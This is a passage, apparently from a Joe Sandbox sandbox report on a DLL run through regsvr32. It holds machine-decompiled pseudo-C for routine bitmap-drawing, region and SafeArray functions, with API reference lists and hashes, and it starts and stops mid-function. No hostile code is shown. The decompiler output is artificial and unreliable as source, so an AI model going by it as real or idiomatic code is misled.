							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xcc0020), _t206 - 0x40, 0xffffff);
							E1000BD03(BitBlt( *(_t206 - 0x4c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0xee0086), _t206 - 0x40, _t146);
							_t151 =  *((intOrPtr*)(_t206 + 0xc));
							if(_t151 != 0) {
								_t152 =  *((intOrPtr*)(_t151 + 4));
							} else {
								_t152 = 0;
							}
							_t153 = E1000D0A1( *(_t206 - 0x2c), _t152);
							 *((intOrPtr*)(_t206 + 0xc)) = _t153;
							if(_t153 == 0) {
								_t154 = 0;
							} else {
								 *((intOrPtr*)(_t206 + 0x14)) = E1000BD03(E1000BDEA(_t153, _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x10))), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
								 *(_t206 - 0x58) =  *(_t206 - 0x74);
								 *(_t206 - 0x54) =  *(_t206 - 0x70);
								 *(_t206 - 0x60) = 0;
								 *((intOrPtr*)(_t206 - 0x5c)) = 0;
								E1000BD03(E1000BDEA(FillRect( *(_t206 - 0x2c), _t206 - 0x60,  *(_t206 - 0x1c)), _t206 - 0x30, _t160), _t206 - 0x30,  *((intOrPtr*)(_t206 + 0x14)));
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x4c), 0, 0, 0x8800c6);
								BitBlt( *(_t206 - 0x2c), 0, 0,  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x3c), 0, 0, 0x660046);
								_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0xc)) + 4));
							}
							E1000D0A1( *(_t206 - 0x2c), _t154);
							E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)( *((intOrPtr*)(_t206 - 0x10)) + 4)));
							E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
						}
					}
				}
				 *(_t206 - 4) = 3;
				 *((intOrPtr*)(_t206 - 0x20)) = 0x10098308;
				L1000CFF6(_t206 - 0x20);
				 *(_t206 - 4) = 2;
				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098308;
				L1000CFF6(_t206 - 0x18);
				 *(_t206 - 4) = 1;
				L1000CD56(_t206 - 0x30);
				 *(_t206 - 4) = 0;
				L1000CD56(_t206 - 0x50);
				 *(_t206 - 4) =  *(_t206 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t206 - 0x40));
			}

0x1000daf6
0x1000daf6
0x1000dafd
0x1000db09
0x1000db0c
0x1000db0f
0x1000db12
0x1000db15
0x1000db18
0x1000db1b
0x1000db1e
0x1000db21
0x1000db24
0x1000db27
0x1000db2a
0x1000db2d
0x1000db30
0x1000db33
0x1000db3a
0x1000db3d
0x1000db4b
0x1000db5c
0x1000dba7
0x1000dbc7
0x1000dbe7
0x1000dbf3
0x1000dbfb
0x1000dc0f
0x1000dc25
0x1000dc2b
0x1000dc33
0x1000dc36
0x1000dc53
0x1000dc7f
0x1000dc9f
0x1000dca4
0x1000dca9
0x1000dcaf
0x1000dcab
0x1000dcab
0x1000dcab
0x1000dcb6
0x1000dcbd
0x1000dcc0
0x1000ddd2
0x1000dcc6
0x1000dce1
0x1000dce7
0x1000dced
0x1000dcf7
0x1000dcfa
0x1000dd12
0x1000dd2d
0x1000dd44
0x1000dd57
0x1000dd5c
0x1000dd5c
0x1000dd63
0x1000dd71
0x1000dd7f
0x1000dd7f
0x1000dc36
0x1000dbc7
0x1000dd8c
0x1000dd90
0x1000dd93
0x1000dd9b
0x1000dd9f
0x1000dda2
0x1000ddaa
0x1000ddae
0x1000ddb6
0x1000ddb9
0x1000ddbe
0x1000ddcf

APIs

__EH_prolog3.LIBCMT ref: 1000DAFD
CreateCompatibleDC.GDI32(00000000), ref: 1000DB4F
CreateCompatibleDC.GDI32(00000000), ref: 1000DB63
CreateCompatibleDC.GDI32(00000000), ref: 1000DB77
GetObjectA.GDI32(00000004,00000018,?), ref: 1000DB96
CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A504), ref: 1000DBE1

Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D

Part of subcall function 1000CFF6: DeleteObject.GDI32(00000000), ref: 1000D005

CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DC09

Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9

GetPixel.GDI32(?,00000000,00000000), ref: 1000DC49

Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DC75
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DC99
FillRect.USER32(?,?,?), ref: 1000DCFD
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD2D
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 1000DD44
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1000DD57

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Create$CompatibleObject$BitmapColor$BrushDeleteFillH_prolog3PatternPixelRectSelect
String ID:
API String ID: 3108931702-0
Opcode ID: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
Instruction ID: 95502b3af191cccb2c1e05c6da46a113522f07a2ea566406e8f46ae750dbc02a
Opcode Fuzzy Hash: d69e9ac2f5f3e8df1549bcf97479c8da18a1381973d928e60a607054227e66a4
Instruction Fuzzy Hash: 1091D275C0021DAEEF11EFA5CC81DEEBBB9FF08280F10812AF519A6165DB319E11DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE7B Relevance: 19.7, APIs: 13, Instructions: 231
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1001FE7B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t135;
				intOrPtr _t194;
				intOrPtr* _t228;
				void* _t230;
				intOrPtr _t233;

				_push(0x38);
				E1004764D(0x1008f4d0, __ebx, __edi, __esi);
				_t228 = __ecx;
				 *((intOrPtr*)(_t230 - 0x30)) = 0;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x1009b784;
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x28)) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1009b784;
				 *((intOrPtr*)(_t230 - 0x20)) = 0;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x1009b784;
				 *(_t230 - 4) = 2;
				L1000EF50(_t230 - 0x2c,  *(_t230 + 8));
				CopyRect(_t230 - 0x44,  *(_t230 + 8));
				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
				L1000CFA3(_t230 - 0x24, 0x1009b784, _t230, CreateRectRgnIndirect(_t230 - 0x44));
				L1000CFA3(_t230 - 0x34, 0x1009b784, _t230, CreateRectRgn(0, 0, 0, 0));
				E1001FC40(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
				_t232 =  *((intOrPtr*)(_t230 + 0x20));
				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
					 *((intOrPtr*)(_t230 + 0x20)) = E1001FDD8(0, 0x1009b784, _t228, _t232);
				}
				_t194 =  *((intOrPtr*)(_t230 + 0x20));
				_t233 = _t194;
				_t234 = _t233 == 0;
				if(_t233 == 0) {
					E1000A069(0, _t194, 0x1009b784, _t228, _t234);
				}
				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
				}
				 *((intOrPtr*)(_t230 - 0x18)) = 0;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1009b784;
				 *((intOrPtr*)(_t230 - 0x10)) = 0;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x1009b784;
				 *(_t230 - 4) = 4;
				if( *(_t230 + 0x14) != 0) {
					L1000CFA3(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
					E1001FC25(_t230 - 0x2c,  *(_t230 + 0x14));
					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
					E1001FC25(_t230 - 0x24, _t230 - 0x44);
					E1001FC40(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
						L1000CFA3(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
						E1001FC40(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
					L1000C878(_t228, _t230 - 0x1c);
					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
					 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x24)));
					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
					E1000D13A(_t228,  *(_t230 + 0x14));
				}
				_t135 = _t230 - 0x14;
				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
					_t135 = _t230 - 0x34;
				}
				L1000C878(_t228, _t135);
				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
				 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x20)));
				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
				if( *(_t230 + 0x14) != 0) {
					E1000D13A(_t228,  *(_t230 + 0x14));
				}
				L1000C878(_t228, 0);
				 *(_t230 - 4) = 3;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x10098308;
				L1000CFF6(_t230 - 0x14);
				 *(_t230 - 4) = 2;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x10098308;
				L1000CFF6(_t230 - 0x1c);
				 *(_t230 - 4) = 1;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x10098308;
				L1000CFF6(_t230 - 0x24);
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x10098308;
				L1000CFF6(_t230 - 0x2c);
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x10098308;
				return E10047725(L1000CFF6(_t230 - 0x34));
			}

0x1001fe7b
0x1001fe82
0x1001fe87
0x1001fe90
0x1001fe93
0x1001fe96
0x1001fe99
0x1001fe9c
0x1001fe9f
0x1001fea2
0x1001feab
0x1001feaf
0x1001febb
0x1001fed1
0x1001fedf
0x1001fef3
0x1001ff06
0x1001ff18
0x1001ff1d
0x1001ff20
0x1001ff27
0x1001ff27
0x1001ff2a
0x1001ff2f
0x1001ff34
0x1001ff36
0x1001ff38
0x1001ff38
0x1001ff40
0x1001ff42
0x1001ff42
0x1001ff45
0x1001ff48
0x1001ff4b
0x1001ff4e
0x1001ff54
0x1001ff58
0x1001ff6e
0x1001ff79
0x1001ff85
0x1001ff9b
0x1001ffa9
0x1001ffb6
0x1001ffc8
0x1001ffd9
0x1001ffe5
0x1001fff7
0x1001fff7
0x1001ffd9
0x1002000e
0x1002001b
0x10020028
0x1002003b
0x10020054
0x1002005b
0x1002005b
0x10020063
0x10020066
0x10020068
0x10020068
0x1002006e
0x1002007b
0x1002008e
0x100200a7
0x100200ac
0x100200b3
0x100200b3
0x100200bb
0x100200c8
0x100200cc
0x100200cf
0x100200d7
0x100200db
0x100200de
0x100200e6
0x100200ea
0x100200ed
0x100200f5
0x100200f8
0x100200fb
0x10020100
0x10020107
0x10020114

APIs

__EH_prolog3.LIBCMT ref: 1001FE82

Part of subcall function 1000EF50: CreateRectRgnIndirect.GDI32(?), ref: 1000EF57

CopyRect.USER32(?,?), ref: 1001FEBB
InflateRect.USER32 ref: 1001FED1
IntersectRect.USER32(?,?,?), ref: 1001FEDF
CreateRectRgnIndirect.GDI32(?), ref: 1001FEE9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FEFC

Part of subcall function 1001FC40: CombineRgn.GDI32(?,?,00000002,?), ref: 1001FC63

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FF68
CopyRect.USER32(?,?), ref: 1001FF85
InflateRect.USER32 ref: 1001FF9B
IntersectRect.USER32(?,?,?), ref: 1001FFA9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FFDF

Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10020054

Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100200A7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
String ID:
API String ID: 3342639795-0
Opcode ID: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
Instruction ID: bd3a7d774bfc99ff7712cfe706d239d58d67da9b393fb4a1fd8b60a1480de821
Opcode Fuzzy Hash: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
Instruction Fuzzy Hash: 039115B590020EAFDF01DFA4CA95DEEBBB9FF08204F104169F506A2251DB34AE05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10023058 Relevance: 19.7, APIs: 13, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E10023058(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t106;
				signed int _t113;
				intOrPtr _t124;
				intOrPtr _t127;
				void* _t133;
				signed int _t141;
				signed int _t143;
				intOrPtr _t170;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int _t193;
				intOrPtr* _t194;
				intOrPtr* _t195;
				signed int _t197;
				intOrPtr* _t198;
				void* _t199;

				_push(0x34);
				E10047680(0x1008f746, __ebx, __edi, __esi);
				_t86 =  *((intOrPtr*)(_t199 + 8));
				if(_t86 == 0 ||  *((intOrPtr*)(_t199 + 0xc)) == 0) {
					__eflags = _t86 -  *((intOrPtr*)(_t199 + 0xc));
					_t83 = _t86 ==  *((intOrPtr*)(_t199 + 0xc));
					__eflags = _t83;
					_t87 = 0 | _t83;
				} else {
					_t191 = __imp__#17;
					_t89 =  *_t191(_t86);
					_t141 = _t89;
					 *(_t199 - 0x30) = _t141;
					_t90 =  *_t191( *((intOrPtr*)(_t199 + 0xc)));
					_t187 = _t90;
					if(_t141 == _t90) {
						__eflags = _t141;
						if(_t141 != 0) {
							_t192 = __imp__#18;
							_t91 =  *_t192( *((intOrPtr*)(_t199 + 8)));
							 *(_t199 - 0x2c) = _t91;
							__eflags =  *(_t199 - 0x2c) -  *_t192( *((intOrPtr*)(_t199 + 0xc)));
							if(__eflags != 0) {
								goto L3;
							} else {
								 *((intOrPtr*)(_t199 - 0x14)) = 0;
								 *((intOrPtr*)(_t199 - 0x18)) = 0;
								 *((intOrPtr*)(_t199 - 0x1c)) = 0;
								 *((intOrPtr*)(_t199 - 0x20)) = 0;
								 *((intOrPtr*)(_t199 - 0x24)) = 0;
								 *((intOrPtr*)(_t199 - 0x28)) = 0;
								 *(_t199 - 4) = 0;
								_t193 = 4;
								 *((intOrPtr*)(_t199 - 0x14)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
								 *((intOrPtr*)(_t199 - 0x18)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
								 *((intOrPtr*)(_t199 - 0x1c)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
								 *((intOrPtr*)(_t199 - 0x20)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
								_t143 = 1;
								_t106 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _t106 -  *(_t199 - 0x30);
									if(_t106 >=  *(_t199 - 0x30)) {
										break;
									}
									_t197 = _t106 << 2;
									_t170 =  *((intOrPtr*)(_t199 - 0x14)) + _t197;
									_t189 = _t106 + 1;
									 *((intOrPtr*)(_t199 - 0x38)) = _t170;
									__imp__#20( *((intOrPtr*)(_t199 + 8)), _t189, _t170);
									E1002303B(_t106);
									_t124 =  *((intOrPtr*)(_t199 - 0x18)) + _t197;
									 *((intOrPtr*)(_t199 - 0x3c)) = _t124;
									__imp__#20( *((intOrPtr*)(_t199 + 0xc)), _t189, _t124);
									E1002303B(_t124);
									_t127 =  *((intOrPtr*)(_t199 - 0x1c)) + _t197;
									 *((intOrPtr*)(_t199 - 0x34)) = _t127;
									__imp__#19( *((intOrPtr*)(_t199 + 8)), _t189, _t127);
									E1002303B(_t127);
									_t198 = _t197 +  *((intOrPtr*)(_t199 - 0x20));
									__imp__#19( *((intOrPtr*)(_t199 + 0xc)), _t189, _t198);
									E1002303B( *((intOrPtr*)(_t199 - 0x20)));
									_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x34)))) -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x38))));
									__eflags = _t133 -  *_t198 -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x3c))));
									if(__eflags == 0) {
										_t143 = _t143 * (_t133 + 1);
										_t106 = _t189;
										continue;
									} else {
										_push( *((intOrPtr*)(_t199 - 0x14)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x18)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x1c)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x20)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										goto L3;
									}
									goto L14;
								}
								_t194 = __imp__#23;
								E1002303B( *_t194( *((intOrPtr*)(_t199 + 8)), _t199 - 0x24));
								E1002303B( *_t194( *((intOrPtr*)(_t199 + 0xc)), _t199 - 0x28));
								_t144 = _t143 *  *(_t199 - 0x2c);
								_t113 = L1004A7B7( *((intOrPtr*)(_t199 - 0x24)),  *((intOrPtr*)(_t199 - 0x28)), _t143 *  *(_t199 - 0x2c));
								_t195 = __imp__#24;
								__eflags = _t113;
								_t188 = 0 | _t113 == 0x00000000;
								E1002303B( *_t195( *((intOrPtr*)(_t199 + 8))));
								E1002303B( *_t195( *((intOrPtr*)(_t199 + 0xc))));
								_push( *((intOrPtr*)(_t199 - 0x14)));
								 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x18)));
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x1c)));
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x20)));
								E10009F3F(_t144, _t188, _t195, __eflags);
								_t87 = _t188;
							}
						} else {
							_t87 = 1;
						}
					} else {
						L3:
						_t87 = 0;
					}
				}
				L14:
				return E10047725(_t87);
			}

0x10023058
0x1002305f
0x10023064
0x10023069
0x100232d6
0x100232d9
0x100232d9
0x100232dc
0x10023079
0x10023079
0x10023080
0x10023085
0x10023087
0x1002308a
0x1002308c
0x10023090
0x10023099
0x1002309b
0x100230a8
0x100230ae
0x100230b3
0x100230b8
0x100230bb
0x00000000
0x100230bd
0x100230c1
0x100230c4
0x100230c7
0x100230ca
0x100230cd
0x100230d0
0x100230d3
0x100230d8
0x100230ec
0x10023105
0x1002311e
0x10023137
0x1002313a
0x1002313c
0x1002313c
0x1002313e
0x1002313e
0x10023141
0x00000000
0x00000000
0x1002314c
0x1002314f
0x10023152
0x10023159
0x1002315c
0x10023163
0x1002316b
0x10023172
0x10023175
0x1002317c
0x10023184
0x1002318b
0x1002318e
0x10023195
0x1002319d
0x100231a4
0x100231ab
0x100231b8
0x100231c1
0x100231c3
0x100231ef
0x100231f2
0x00000000
0x100231c5
0x100231c5
0x100231c8
0x100231ce
0x100231d1
0x100231d7
0x100231da
0x100231e0
0x100231e3
0x00000000
0x100231e8
0x00000000
0x100231c3
0x100231f9
0x10023209
0x10023218
0x1002321d
0x10023228
0x1002322d
0x1002323b
0x10023240
0x10023245
0x10023250
0x10023255
0x10023258
0x1002325c
0x10023261
0x10023264
0x10023269
0x1002326c
0x10023271
0x10023274
0x1002327c
0x1002327c
0x1002309d
0x1002309f
0x1002309f
0x10023092
0x10023092
0x10023092
0x10023092
0x10023090
0x100232de
0x100232e3

APIs

__EH_prolog3_catch.LIBCMT ref: 1002305F
SafeArrayGetDim.OLEAUT32(?), ref: 10023080
SafeArrayGetDim.OLEAUT32(00000000), ref: 1002308A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$H_prolog3_catch
String ID:
API String ID: 4271779948-0
Opcode ID: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
Instruction ID: 44957efc3b56635bff52d89a81c6fb787a21c65e9e7561bfa9423d8dcc95ac9e
Opcode Fuzzy Hash: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
Instruction Fuzzy Hash: 06615176E00159AFEF04DFB4DC858AEBFB5EF08390B50846AF405E72A0DB359910CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000D64C Relevance: 18.2, APIs: 12, Instructions: 206
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000D64C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t121;
				intOrPtr _t127;
				intOrPtr _t128;
				void* _t175;
				void* _t176;

				_t176 = __eflags;
				_t166 = __edi;
				_push(0x58);
				E1004764D(0x1008e0cd, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t175 - 0x3c)) = 0x1009a2fc;
				 *(_t175 - 0x38) = 0;
				 *((intOrPtr*)(_t175 - 0x34)) = 0;
				 *((intOrPtr*)(_t175 - 0x30)) = 0;
				 *(_t175 - 4) = 0;
				 *((intOrPtr*)(_t175 - 0x4c)) = 0x1009a2fc;
				 *(_t175 - 0x48) = 0;
				 *((intOrPtr*)(_t175 - 0x44)) = 0;
				 *((intOrPtr*)(_t175 - 0x40)) = 0;
				 *((intOrPtr*)(_t175 - 0x18)) = 0;
				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098d24;
				 *(_t175 - 4) = 2;
				_push(GetSysColor(0x14));
				E1000D544(0, _t175 - 0x2c, __edi, GetSysColor, _t176);
				 *(_t175 - 4) = 3;
				_push(GetSysColor(0x10));
				E1000D544(0, _t175 - 0x24, __edi, GetSysColor, _t176);
				 *(_t175 - 4) = 4;
				if(L1000CCDC(_t175 - 0x3c, _t166, _t175, CreateCompatibleDC(0)) != 0 && L1000CCDC(_t175 - 0x4c, _t166, _t175, CreateCompatibleDC(0)) != 0) {
					_t173 =  *((intOrPtr*)(_t175 + 8));
					GetObjectA( *( *((intOrPtr*)(_t175 + 8)) + 4), 0x18, _t175 - 0x64);
					L1000CFF6( *((intOrPtr*)(_t175 + 0xc)));
					if(L1000111D( *((intOrPtr*)(_t175 + 0xc)),  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x54) & 0x0000ffff,  *(_t175 - 0x52) & 0x0000ffff, 0) != 0 && L1000CFA3(_t175 - 0x1c, _t166, _t175, CreateBitmap( *(_t175 - 0x60),  *(_t175 - 0x5c), 1, 1, 0)) != 0) {
						 *((intOrPtr*)(_t175 + 8)) = E1000D0A1( *(_t175 - 0x38),  *((intOrPtr*)(_t173 + 4)));
						_t121 = E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)(_t175 - 0x18)));
						 *((intOrPtr*)(_t175 - 0x14)) = _t121;
						if( *((intOrPtr*)(_t175 + 8)) != 0 && _t121 != 0) {
							 *((intOrPtr*)(_t175 - 0x10)) = E1000BD03(GetPixel( *(_t175 - 0x38), 0, 0), _t175 - 0x3c, _t122);
							E1000BD03(BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0xcc0020), _t175 - 0x3c, 0xffffff);
							BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0x1100a6);
